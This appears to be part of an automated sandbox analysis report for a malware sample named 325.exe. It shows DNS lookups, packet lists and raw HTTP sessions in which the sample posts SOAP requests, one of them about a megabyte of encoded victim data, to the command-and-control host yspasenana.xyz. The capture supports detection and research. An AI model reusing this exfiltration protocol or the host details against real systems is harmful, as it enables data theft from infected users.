                                                                                                                                                                            Jul 22, 2021 11:44:12.874239922 CEST8049742212.224.105.105192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:44:12.874377012 CEST8049742212.224.105.105192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:44:12.874700069 CEST8049742212.224.105.105192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:44:12.875019073 CEST8049742212.224.105.105192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:44:12.875354052 CEST8049742212.224.105.105192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:44:12.875751019 CEST8049742212.224.105.105192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:44:12.875772953 CEST8049742212.224.105.105192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:44:12.876094103 CEST8049742212.224.105.105192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:44:12.876550913 CEST8049742212.224.105.105192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:44:12.876820087 CEST8049742212.224.105.105192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:44:12.876842022 CEST8049742212.224.105.105192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:44:12.877291918 CEST8049742212.224.105.105192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:44:12.877670050 CEST8049742212.224.105.105192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:44:12.877953053 CEST8049742212.224.105.105192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:44:12.878750086 CEST8049742212.224.105.105192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:44:12.879064083 CEST8049742212.224.105.105192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:44:13.002619982 CEST8049742212.224.105.105192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:44:13.056925058 CEST4974280192.168.2.3212.224.105.105
                                                                                                                                                                            Jul 22, 2021 11:44:13.214579105 CEST4974280192.168.2.3212.224.105.105
                                                                                                                                                                            Jul 22, 2021 11:44:13.214859962 CEST4974180192.168.2.3212.224.105.105

                                                                                                                                                                            UDP Packets

                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                            Jul 22, 2021 11:42:50.436938047 CEST6015253192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:42:50.497740984 CEST53601528.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:51.506886005 CEST5754453192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:42:51.556329966 CEST53575448.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:53.869375944 CEST5598453192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:42:53.933244944 CEST53559848.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:55.227030993 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:42:55.279035091 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:56.549263000 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:42:56.598376989 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:58.664081097 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:42:58.675287962 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:42:58.717329979 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:58.733603001 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:59.322242022 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:42:59.391592026 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:59.694236040 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:42:59.755548954 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:59.934425116 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:42:59.983728886 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:00.422305107 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:43:00.481355906 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:06.890603065 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:43:06.942991972 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:08.491096973 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:43:08.543608904 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:15.305854082 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:43:15.357764006 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:16.421140909 CEST5934953192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:43:16.480875969 CEST53593498.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:17.391518116 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:43:17.443506002 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:18.342683077 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:43:18.402529001 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:19.320419073 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:43:19.380341053 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:22.690311909 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:43:22.748423100 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:27.981369019 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:43:28.054693937 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:28.617409945 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:43:28.674328089 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:29.461571932 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:43:29.515253067 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:39.283081055 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:43:39.342900991 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:50.319731951 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:43:50.370299101 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:51.512294054 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:43:51.565135956 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:57.058478117 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:43:57.131546974 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:59.928487062 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:43:59.988356113 CEST53565798.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:44:04.846780062 CEST6063353192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:44:04.907150984 CEST53606338.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:44:06.823750973 CEST6129253192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:44:06.884871960 CEST53612928.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:44:06.892400026 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:44:06.953299999 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:44:11.579966068 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:44:11.641484976 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:44:12.352585077 CEST6194653192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:44:12.412575006 CEST53619468.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:44:31.821844101 CEST6491053192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:44:31.893857956 CEST53649108.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:44:33.378647089 CEST5212353192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:44:33.436006069 CEST53521238.8.8.8192.168.2.3

                                                                                                                                                                            DNS Queries

                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                            Jul 22, 2021 11:42:58.675287962 CEST192.168.2.38.8.8.80x574aStandard query (0)iplogger.orgA (IP address)IN (0x0001)
                                                                                                                                                                            Jul 22, 2021 11:42:59.322242022 CEST192.168.2.38.8.8.80x554Standard query (0)is.gdA (IP address)IN (0x0001)
                                                                                                                                                                            Jul 22, 2021 11:42:59.694236040 CEST192.168.2.38.8.8.80x65e1Standard query (0)bitbucket.orgA (IP address)IN (0x0001)
                                                                                                                                                                            Jul 22, 2021 11:43:00.422305107 CEST192.168.2.38.8.8.80xd23cStandard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)
                                                                                                                                                                            Jul 22, 2021 11:44:04.846780062 CEST192.168.2.38.8.8.80xda5eStandard query (0)yspasenana.xyzA (IP address)IN (0x0001)
                                                                                                                                                                            Jul 22, 2021 11:44:06.823750973 CEST192.168.2.38.8.8.80xd22dStandard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                                                                                                                            Jul 22, 2021 11:44:06.892400026 CEST192.168.2.38.8.8.80x9e5cStandard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                                                                                                                            Jul 22, 2021 11:44:11.579966068 CEST192.168.2.38.8.8.80x4d94Standard query (0)yspasenana.xyzA (IP address)IN (0x0001)
                                                                                                                                                                            Jul 22, 2021 11:44:12.352585077 CEST192.168.2.38.8.8.80xa170Standard query (0)yspasenana.xyzA (IP address)IN (0x0001)

                                                                                                                                                                            DNS Answers

                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                            Jul 22, 2021 11:42:58.733603001 CEST8.8.8.8192.168.2.30x574aNo error (0)iplogger.org88.99.66.31A (IP address)IN (0x0001)
                                                                                                                                                                            Jul 22, 2021 11:42:59.391592026 CEST8.8.8.8192.168.2.30x554No error (0)is.gd104.25.234.53A (IP address)IN (0x0001)
                                                                                                                                                                            Jul 22, 2021 11:42:59.391592026 CEST8.8.8.8192.168.2.30x554No error (0)is.gd172.67.83.132A (IP address)IN (0x0001)
                                                                                                                                                                            Jul 22, 2021 11:42:59.391592026 CEST8.8.8.8192.168.2.30x554No error (0)is.gd104.25.233.53A (IP address)IN (0x0001)
                                                                                                                                                                            Jul 22, 2021 11:42:59.755548954 CEST8.8.8.8192.168.2.30x65e1No error (0)bitbucket.org104.192.141.1A (IP address)IN (0x0001)
                                                                                                                                                                            Jul 22, 2021 11:43:00.481355906 CEST8.8.8.8192.168.2.30xd23cNo error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                            Jul 22, 2021 11:43:00.481355906 CEST8.8.8.8192.168.2.30xd23cNo error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                            Jul 22, 2021 11:43:00.481355906 CEST8.8.8.8192.168.2.30xd23cNo error (0)s3-w.us-east-1.amazonaws.com52.217.201.169A (IP address)IN (0x0001)
                                                                                                                                                                            Jul 22, 2021 11:44:04.907150984 CEST8.8.8.8192.168.2.30xda5eNo error (0)yspasenana.xyz212.224.105.105A (IP address)IN (0x0001)
                                                                                                                                                                            Jul 22, 2021 11:44:06.884871960 CEST8.8.8.8192.168.2.30xd22dNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                            Jul 22, 2021 11:44:06.953299999 CEST8.8.8.8192.168.2.30x9e5cNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                            Jul 22, 2021 11:44:11.641484976 CEST8.8.8.8192.168.2.30x4d94No error (0)yspasenana.xyz212.224.105.105A (IP address)IN (0x0001)
                                                                                                                                                                            Jul 22, 2021 11:44:12.412575006 CEST8.8.8.8192.168.2.30xa170No error (0)yspasenana.xyz212.224.105.105A (IP address)IN (0x0001)

                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                            • yspasenana.xyz

                                                                                                                                                                            HTTP Packets

                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                            0192.168.2.349739212.224.105.10580C:\Users\user\AppData\Roaming\325.exe
                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                            Jul 22, 2021 11:44:05.202037096 CEST6920OUTPOST / HTTP/1.1
                                                                                                                                                                            Content-Type: text/xml; charset=utf-8
                                                                                                                                                                            SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                                                                                                                                            Host: yspasenana.xyz
                                                                                                                                                                            Content-Length: 144
                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Jul 22, 2021 11:44:05.249474049 CEST6920INHTTP/1.1 100 Continue
                                                                                                                                                                            Jul 22, 2021 11:44:05.250051022 CEST6920OUTData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65
                                                                                                                                                                            Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettings xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                                                                                                                                                                            Jul 22, 2021 11:44:05.354886055 CEST6922INHTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 22 Jul 2021 09:44:05 GMT
                                                                                                                                                                            Content-Type: text/xml; charset=utf-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                            Keep-Alive: timeout=3
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                                            Data Raw: 33 65 34 0d 0a 1f 8b 08 00 00 00 00 00 02 03 bd 58 6d 8f e2 36 10 fe 2b 11 d2 4a 2d ba 25 5c b7 dd 9e 10 87 c4 4b d8 a2 2e bb 94 70 7b ad 94 2f c6 19 88 8b e3 89 6c 67 03 ab fb f1 75 42 c2 42 ef b6 2a 31 ad 84 48 3c e3 79 32 1e 8f c7 8f dd 55 1d 4f 3c 03 c7 04 9c 6d cc 85 ea a8 8f 8d 48 eb a4 e3 ba 8a 46 10 13 d5 32 72 85 24 69 a1 5c bb f9 8b 0b a5 85 db e8 75 55 67 80 e1 ae d7 35 28 4c a2 88 41 68 1f b4 66 62 ad e6 a0 12 14 aa 04 3e c0 6a 88 93 54 b2 02 ae f1 96 61 ca 75 e9 0f f9 d8 18 48 cc 14 48 6f ab 41 28 86 a2 51 aa d8 01 33 cb b2 56 76 53 40 fe d0 6e bf 77 7f 9f de fb 85 f7 d7 4c 28 4d 04 05 f3 25 d2 19 70 a4 1b 08 87 98 0a 2d 77 25 ca f2 ab 01 c7 8c 4a 54 b8 d2 2d 8a 71 0e 78 e3 be 6f bb 3e 48 46 38 7b 21 da b8 e0 f6 a5 24 3b d5 70 8f 60 27 b3 8b 21 3e 2e ff 04 aa 7f ec 69 99 42 d7 7d 6d 1f 54 b7 bd 15 e1 ea 48 77 9b eb 7c 4a 44 19 2c 75 b0 3d 11 96 9d 86 91 c4 18 2a e9 8c e8 48 5d c2 f7 5e 77 d9 51 5a 9a 39 ec 5d 7d f2 bd f9 6c fe 38 9e dc 7b 57 41 3f 49 46 44 93 e0 1e 29 e1 c1 80 68 cd a1 25 40 77 dd 83 c1 bf 33 2d 1c 67 69 1c 7c 32 8e 3b b9 e2 6c 88 3b c4 35 87 3d 12 58 e3 7c b7 fd 70 fb bd 0d d8 1c 49 6c b4 c1 63 02 92 38 be 89 73 46 24 04 67 bb 33 25 09 07 5f a7 21 c3 d2 9d 19 4f 95 c5 f8 26 92 85 76 91 fe d9 d7 44 96 ff f5 51 86 a6 32 94 99 6a 83 12 41 88 da 02 e0 89 3d 13 1e 32 0b 84 5f cd 9c 98 46 7d 00 8f 43 5e 26 95 63 1f 0e 2f 61 d4 99 49 33 26 ba bb 00 5c 3a c4 97 29 84 cc 8c 4e 12 61 01 34 06 21 99 74 26 82 06 3e 07 96 08 26 7f 0a d4 7e 5f 08 62 0c 53 0e ea 50 04 9e 18 64 20 cf 4f 05 f3 ca 99 20 77 12 d3 24 18 32 63 81 36 99 85 98 a1 a8 1e f5 71 38 83 25 b1 71 e4 37 b3 01 f9 a9 5c 59 40 3c ca 25 d3 56 6b 7e 88 66 96 30 18 49 b2 b6 8a 46 3f 66 eb 7d 30 2c 40 16 28 69 64 61 ff 07 11 21 6c cb c7 05 6a d0 3e 36 f5 01 6e 6e db 95 17 f6 de 4c c9 56 47 28 6e 6c 2a da f5 d4 10 41 9b 69 f6 93 54 0b b6 39 3c eb 23 3d 30 6a bb a3 0f 91 9a df 05 42 6b 59 04 8b fa 66 97 29 53 c2 78 6b 9e 06 7d 8d 36 ab 79 20 c9 33 1c 38 49 d1 ba be 40 e6 55 8c 32 f0 c2 b5 cd 84 3d 3c 4d 46 93 be 33 44 99 a0 2c 98 68 25 ba 83 b1 59 fb e0 78 5b 43 ab 18 98 03 c0 f9 a9 a9 81 c4 e7 cf 9d dc 25 1a 17 64 f9 cf bb aa fb 26 0f af 28 fa 88 29 8a 32 7c e5 f9 c7 c2 b2 cf 78 31 3b a1 f9 79 bb 52 31 b3 53 9e 2a 0b c9 b1 fa 3f e1 fd a9 19 49 22 71 65 3e 70 15 8c 40 6d 34 26 5f 9a 2d bd d5 ef 9a ad 10 69 f3 5d 73 03 3b f3 9f 11 ce 41 9b 17 05 10 36 bf b4 bf 1d ea 53 38 a4 69 c1 80 ce 06 74 ff 3e ec 2a 10 77 40 37 f8 ff 1f 84 2a d6 3f c5 17 c6 39 09 c6 4c c2 0a b7 35 ce 0d 9f 89 06 59 cf b4 28 df 80 a2 86 e9 22 4a cd 9e 68 d8 82 0c 6b 58 97 1b e1 84 c2 9e 27 d4 80 f8 90 00 dd aa e2 b8 63 08 e1 6e 59 37 06 0f de e2 ae bf f0 9c 05 d0 48 20 c7 35 33 04 73 c0 09 dd fc 42 b2 1a 78 53 44 41 23 c6 43 c3 ae 0d 5d a5 79 56 a8 60 46 38 38 b9 ea 1b 39 f9 75 06 56 b9 e9 53 09 20 4e 16 71 29 aa 3a e4 25 ea b4 42 ec 45 a5 7e 61 a6 77 2d 4d fb 18 e2 20 2c 3b 3d cd 1e 4e 21 72 41 a9 fb 5c 2c a9 d3 3a 52 c9 ba ee 9b 57 37 6f ea 8a fb 20 a3 ad 6e 8d dc d7 eb a7 de 5f e7 f1 c2 3e 8b 12 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: 3e4Xm6+J-%\K.p{/lguBB*1H<y2UO<mHF2r$i\uUg5(LAhfb>jTauHHoA(Q3VvS@nwL(M%p-w%JT-qxo>HF8{!$;p`'!>.iB}mTHw|JD,u=*H]^wQZ9]}l8{WA?IFD)h%@w3-gi|2;l;5=X|pIlc8sF$g3%_!O&vDQ2jA=2_F}C^&c/aI3&\:)Na4!t&>&~_bSPd O w$2c6q8%q7\Y@<%Vk~f0IF?f}0,@(ida!lj>6nnLVG(nl*AiT9<#=0jBkYf)Sxk}6y 38I@U2=<MF3D,h%Yx[C%d&()2|x1;yR1S*?I"qe>p@m4&_-i]s;A6S8it>*w@7*?9L5Y("JhkX'cnY7H 53sBxSDA#C]yV`F889uVS Nq):%BE~aw-M ,;=N!rA\,:RW7o n_>0


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                            1192.168.2.349741212.224.105.10580C:\Users\user\AppData\Roaming\325.exe
                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                            Jul 22, 2021 11:44:11.703536034 CEST6928OUTPOST / HTTP/1.1
                                                                                                                                                                            Content-Type: text/xml; charset=utf-8
                                                                                                                                                                            SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                                                                                                                            Host: yspasenana.xyz
                                                                                                                                                                            Content-Length: 1125491
                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                            Jul 22, 2021 11:44:11.753475904 CEST6928INHTTP/1.1 100 Continue
                                                                                                                                                                            Jul 22, 2021 11:44:11.755002975 CEST6941OUTData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f
                                                                                                                                                                            Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironment xmlns="http://tempuri.org/"><user xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:City>UNKNOWN</a:City><a:Country>CH</a:C
                                                                                                                                                                            Jul 22, 2021 11:44:11.802614927 CEST6947OUTData Raw: 72 45 6e 67 65 54 75 48 6a 71 6c 79 64 41 6c 41 78 73 63 54 4d 6a 62 4c 78 47 64 49 74 6b 6c 51 62 49 50 53 49 56 4a 35 35 48 61 45 54 4f 76 7a 69 50 6a 52 45 77 69 2b 4c 6b 4b 68 35 4a 38 38 61 39 45 66 75 57 57 67 6a 43 75 45 66 30 44 45 73 66
                                                                                                                                                                            Data Ascii: rEngeTuHjqlydAlAxscTMjbLxGdItklQbIPSIVJ55HaETOvziPjREwi+LkKh5J88a9EfuWWgjCuEf0DEsfVzAlZs9VdVBHXSMtDRnkeLPl8Np8ulT+6n9woSgDkJyPtToDwOf1x1HXV87rfrfkJrDwvo/1mAAIyQ91sHWgCmoXEhDx5/uojHny5kvdD+GvT8Pi5wjgGgvERpOga36RqM/g871V5JUOwwA6CYqAYUcwWo+CzIJ/e
                                                                                                                                                                            Jul 22, 2021 11:44:11.802659988 CEST6952OUTData Raw: 57 67 30 59 77 79 41 69 6a 78 38 7a 4b 35 44 35 77 7a 4c 30 66 4c 4c 63 43 4d 39 7a 2b 71 41 36 6a 57 68 6b 73 55 72 58 52 77 42 4f 43 72 6b 32 6e 43 46 38 50 41 37 57 44 6b 75 47 58 74 63 73 4e 39 41 35 64 54 44 78 61 77 43 75 2f 56 6f 42 50 33
                                                                                                                                                                            Data Ascii: Wg0YwyAijx8zK5D5wzL0fLLcCM9z+qA6jWhksUrXRwBOCrk2nCF8PA7WDkuGXtcsN9A5dTDxawCu/VoBP3gCJ62AtABEEnCnv3ujE4D6e/52Ovj7DikACXoacM8TThlUAG751P8XST9JHERWEAhAFWygQIODbSkAiXYC33ffNzcC0H/0l5/+I/n3UctB5tTTv+Lly7MOv8BJmStvoKezbjV7fQsLwN/97mLzvd9cZR6zarWTM7M
                                                                                                                                                                            Jul 22, 2021 11:44:11.802870035 CEST6965OUTData Raw: 55 72 44 67 6b 51 75 6a 43 46 53 6d 51 4c 63 33 67 39 49 53 4b 47 30 58 71 42 77 45 79 6a 73 75 55 76 4c 6c 30 47 33 4b 32 2b 4d 46 63 7a 64 79 2f 74 66 78 77 64 42 49 34 59 65 51 73 56 79 53 75 51 44 73 6a 5a 52 6c 61 4c 39 47 70 74 66 41 39 4e
                                                                                                                                                                            Data Ascii: UrDgkQujCFSmQLc3g9ISKG0XqBwEyjsuUvLl0G3K2+MFczdy/tfxwdBI4YeQsVySuQDsjZRlaL9GptfA9Ns8rx/bPt8RlAWOJbdBUNv1wF8nfT1ZAAoRSOKPgX2CUP0q6pvc/8E9MyjoY8MSMD6MBYjRc8gxDqLmezSGjoUaV7uAcxgA5YWgOo0Bmrc0KB/TlUaWMwQ6ntGgGGhQwNplFvDrC7FeWRLQOnA5oOsvz8kyifblMmt
                                                                                                                                                                            Jul 22, 2021 11:44:11.843419075 CEST6968OUTData Raw: 56 74 6c 42 66 38 55 75 76 6c 35 4e 38 39 6c 4a 36 2f 38 49 4f 55 58 31 33 58 36 56 2f 65 73 6b 73 38 73 36 39 32 6a 4b 73 76 6b 58 36 4f 4f 62 68 43 31 76 67 63 51 65 53 5a 7a 56 42 35 6a 74 2f 2b 69 70 6a 61 42 36 70 62 30 47 66 32 54 54 37 37
                                                                                                                                                                            Data Ascii: VtlBf8Uuvl5N89lJ6/8IOUX13X6V/esks8s692jKsvkX6OObhC1vgcQeSZzVB5jt/+ipjaB6pb0Gf2TT77CfzXuy2YX+JjHnRGQrACmfPI6TuMQzmzJ2obYa1c+VR1KRcPmoTrb9qA3X+fc2HXhPx6H2A+3kJ2J9jehYJPAIWUfeTk8Z/gVJN3Fu1OeIe1D9bXqSp3Q+T9k/bhvqA/rc0PF0X9HtSWJNHtPl4XLp3O0+e268mOx
                                                                                                                                                                            Jul 22, 2021 11:44:11.850198030 CEST6971OUTData Raw: 49 4e 73 66 38 46 74 36 6e 4e 64 73 54 39 39 39 53 4e 4b 4f 68 44 37 39 49 49 67 58 79 37 5a 73 45 6e 78 55 44 33 6f 36 56 33 30 45 4f 4e 6e 6e 62 62 71 46 2b 32 35 71 2b 46 65 73 6d 31 2b 79 74 6e 32 49 6f 66 75 49 66 69 57 59 76 69 63 43 42 41
                                                                                                                                                                            Data Ascii: INsf8Ft6nNdsT999SNKOhD79IIgXy7ZsEnxUD3o6V30EONnnbbqF+25q+Fesm1+ytn2IofuIfiWYvicCBAQjUFCSRgdAcwGYR0qqPqAyJVF7qPbUROlBmQSqC0QLCSA1soBjl6DrgdKE2L4G0O2RA7Vn1L9TwDotX3y7o2sq0P1DAxerFSCpVwMqMwAsmgPoHHvg5yz6W4DaKEck/9Y2AegFWQIl1JD0k+j0k2e6AlDuS+3PIgU
                                                                                                                                                                            Jul 22, 2021 11:44:11.850276947 CEST6979OUTData Raw: 4d 4b 71 48 72 4b 2b 55 4e 53 53 49 53 4e 52 77 4f 31 45 64 4b 54 31 4a 4e 73 72 44 64 65 52 7a 35 6e 49 6b 4c 41 41 64 34 6e 72 59 76 78 63 32 73 59 4d 63 44 65 51 6b 41 57 31 65 45 6f 48 42 2b 66 41 35 4f 35 45 6b 32 6f 48 32 6b 62 52 6a 4f 44
                                                                                                                                                                            Data Ascii: MKqHrK+UNSSISNRwO1EdKT1JNsrDdeRz5nIkLAAd4nrYvxc2sYMcDeQkAW1eEoHB+fA5O5Ek2oH2kbRjOD09/ee+P9C2AbWFK2OLNCR13FNa9nyoLUAb+YW6vkbu3MQ58zZKQ2mpD7IElGnadK5PkfzbjP6Xy3Zk1TYeuY3KzfUVOg7nA8f09ZX75HbexveGhvbbst11axeg8J5jAWjh+yc6BvPgh9p7a5sG+tuyuMFjzOKGT3C
                                                                                                                                                                            Jul 22, 2021 11:44:11.850358963 CEST6989OUTData Raw: 49 52 65 39 6b 77 49 64 4e 34 58 4f 4a 39 2f 7a 4e 70 6c 57 76 75 2b 44 4b 43 4d 53 43 53 58 6c 64 36 52 42 38 6f 39 41 73 6f 53 59 43 38 42 77 50 78 4a 55 30 79 52 71 66 38 30 4d 43 55 41 70 2f 6c 49 43 4d 45 64 77 33 6b 6a 32 49 55 41 66 6c 69
                                                                                                                                                                            Data Ascii: IRe9kwIdN4XOJ9/zNplWvu+DKCMSCSXld6RB8o9AsoSYC8BwPxJU0yRqf80MCUAp/lICMEdw3kj2IUAfliDpJ3H3Cd1zErENCUB5j6JtnprxgdJK2u0ch/r5VlIwFqO5sAY4p9UA5vaJI9cnan1VC1pz18Dr+b4gCScZ91eCZb4SUBkTBUm5aYLqNARQ9iFUfwB9LIfOPy34+Iub7gCRdcwxeQGIpEwOVIZEpUd1cqBzaalpLH2
                                                                                                                                                                            Jul 22, 2021 11:44:11.850747108 CEST6997OUTData Raw: 6e 67 4c 77 43 57 5a 68 76 55 63 35 4b 63 65 43 6a 74 42 43 73 41 54 4f 49 32 55 66 67 59 51 66 65 74 4a 50 53 7a 39 2b 32 6f 2f 46 33 2b 71 57 33 39 7a 7a 6e 6d 5a 68 33 63 65 59 68 51 32 65 36 44 75 66 62 77 52 78 51 30 2b 62 4f 33 39 2f 74 4c
